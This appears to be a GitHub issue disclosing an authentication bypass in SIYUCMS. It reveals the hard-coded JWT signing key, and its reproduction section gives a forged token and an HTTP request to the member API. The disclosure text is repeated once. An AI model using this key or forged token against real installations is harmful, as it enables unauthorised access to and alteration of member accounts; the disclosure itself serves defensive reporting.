You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This vulnerability exists in the member management system, the member login system uses JWT to verify the identity of the logged member, but the key of the JWT is directly stored in the code in a hard-coded way, resulting in the emergence of the SIYUCMS identity authentication bypass vulnerability, and the attacker can access the specific interface through the forged JWT token to query and modify the member information.
Version:
<=V6.1.5(github)
<=V6.1.9(gitee)
Vulnerability Recurrence:
Use the default key 1faASDF3 to forge the user token with uid 1
2.Using this token, visit interface/index.php/api/user/index to get user information
GET /index.php/api/user/index HTTP/1.1
Host: 127.0.0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJhcGkuc2l5dWNtcy5jb20iLCJhdWQiOiJzaXl1Y21zX2FwcCIsImlhdCI6MTU2MzUyNTc4MCwiZXhwIjozNTYzNTI5MzgwLCJ1aWQiOjF9.beAd1JYyQQlS8Wv5nK9alzztlJcxLwmAHK71Vx-95L0
Accept-Encoding: gzip
Vulnerability Analysis:
\app\api\service\JwtAuth::$secrect encrypts JWT using hard-coded key
The text was updated successfully, but these errors were encountered:
Vulnerability description:
This vulnerability exists in the member management system, the member login system uses JWT to verify the identity of the logged member, but the key of the JWT is directly stored in the code in a hard-coded way, resulting in the emergence of the SIYUCMS identity authentication bypass vulnerability, and the attacker can access the specific interface through the forged JWT token to query and modify the member information.
Version:
<=V6.1.5(github)
<=V6.1.9(gitee)
Vulnerability Recurrence:
2.Using this token, visit interface/index.php/api/user/index to get user information
Vulnerability Analysis:
\app\api\service\JwtAuth::$secrect encrypts JWT using hard-coded key
The text was updated successfully, but these errors were encountered: